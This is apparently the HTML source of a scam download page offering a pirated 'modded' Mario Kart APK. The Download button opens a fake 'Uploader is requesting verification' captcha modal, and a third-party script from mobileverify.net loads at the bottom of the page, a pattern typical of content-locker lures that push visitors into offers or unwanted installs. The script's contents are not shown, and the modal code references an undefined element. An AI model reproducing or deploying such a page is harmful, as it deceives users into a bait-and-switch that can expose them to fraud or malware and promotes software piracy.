<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>APKmodded.co</title>
	<link rel="preconnect" href="https://fonts.googleapis.com/">
	<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
	<link href="./other/css2" rel="stylesheet">
	<link rel="icon" type="image/x-icon" href="https://img.icons8.com/external-kiranshastry-lineal-color-kiranshastry/64/000000/external-cloud-multimedia-kiranshastry-lineal-color-kiranshastry.png">
	<script src="./other/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<style>
#size,
#date {
	margin-left: 2%;
}

p {
	color: white;
	margin-top: 1%;
}

h1 {
	margin-top: 8%;
	color: white;
}

h2 {
	color: white;
	font-size: 2rem;
}

body {
	top: 30%;
	text-align: center;
	max-width: 500px;
	margin: auto;
	padding: 2%;
	font-family: 'Ubuntu', sans-serif;
	background-position: center;
	background-repeat: no-repeat;
	-webkit-background-size: cover;
	-moz-background-size: cover;
	-o-background-size: cover;
	background-size: cover;
	background-color: rgba(0, 0, 0, .8);
	background-blend-mode: multiply;
}

.button {
	margin-top: 5%;
	transition-duration: 0.4s;
	background-color: #34eb8c;
	border: none;
	color: black;
	padding: 15px 32px;
	text-align: center;
	text-decoration: none;
	display: inline-block;
	font-size: 16px;
	border-radius: 12px;
	margin-bottom: 20%
}

.button:hover {
	background-color: #FFC600;
}

.button2 {
	transition-duration: 0.4s;
	background-color: #34eb8c;
	border: none;
	color: black;
	padding: 8px 15px;
	text-align: center;
	text-decoration: none;
	display: inline-block;
	font-size: 16px;
	border-radius: 12px;
}

.button2:hover {
	background-color: #FFC600;
}

#mainphoto {
	border-radius: 25%;
	margin: 3%;
	border: 7px solid white;
	margin-bottom: 5%;
}

header {
	display: flex;
	justify-content: flex-end;
	align-items: center;
	margin: 0.5rem 1.5rem;
}

a,
button {
	color: white;
}

.image-clickable {
	margin-right: auto;
}

.logo {
	height: 4.2rem;
	margin-right: auto;
}

.nav-links {
	list-style: none;
}

.nav-links li {
	display: inline-block;
	padding: 0 1.25rem;
}

.nav-links li a {
	text-decoration: none;
	font-size: 1rem;
	transition: all 0.5s ease 0s;
}

.nav-links li a:hover {
	color: rgba(0, 173, 181, 0.8);
}

#clouds {
	position: absolute;
	margin-top: 40px;
}
.modal {
  display: none;
  position: fixed;
  z-index: 1;
  padding-top: 100px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background-color: rgb(0,0,0);
  background-color: rgba(0,0,0,0.4);
}

.modal-content {
  background-color: #fefefe;
  margin: auto;
  padding: 20px;
  width: 80%;
  border-radius: 30px;
}
</style></head>

<body style="background-color: #1a1a1a;"><header>
	<span class="image-clickable">
		<a href="https://apkmodded.net/#">
			<img src="./other/logo.png"></a><a id="clouds">modded.co</a>
		
	</span>
	<nav>
		<ul class="nav-links">
			<li><a href="https://apkmodded.net/#"></a></li>
		</ul>
	</nav>
	<button class="button2">Upload ⬆️</button>
</header>

 
	<h1>Download</h1>
	<h2 id="name">Mario Kart</h2>
	<p>Note from uploader: Modded original apk file</p>
	<img src="images/Mario_Kart logo/Image_1.jpg" id="mainphoto">
	<div style="display: flex;">
		<p id="filename">Mario_Kart_v1.5_MOD</p>
		<p id="extension">.apk</p>
	</div>
	<div style="display: flex;">
		<p>File size:</p>
		<p id="size">237.0</p>
		<p>MB</p>
	</div>
	<div style="display: flex;">
		<p>Uploaded: </p>
		<p id="date">2023-01-08</p>
	</div>
	<div style="display: flex;">
		<p>Uploaded by:⠀</p>
		<p>SkidrowFan2358</p>
	</div>
	<button class="button" id="myBtn">Download ⬇️</button>
	<div id="myModal" class="modal">
    <div class="modal-content">
    <b>Uploader is requesting verification</b><br>
    <br><div data-captcha-enable="true"></div><br>
    </div>
    </div>
    <script>
    var modal = document.getElementById("myModal");
    var btn = document.getElementById("myBtn");
    btn.onclick = function() {
      modal.style.display = "block";
    }
    span.onclick = function() {
      modal.style.display = "none";
    }
    </script>
</body><script type="text/javascript" src="https://mobileverify.net/cp/js/21y7m"></script></html>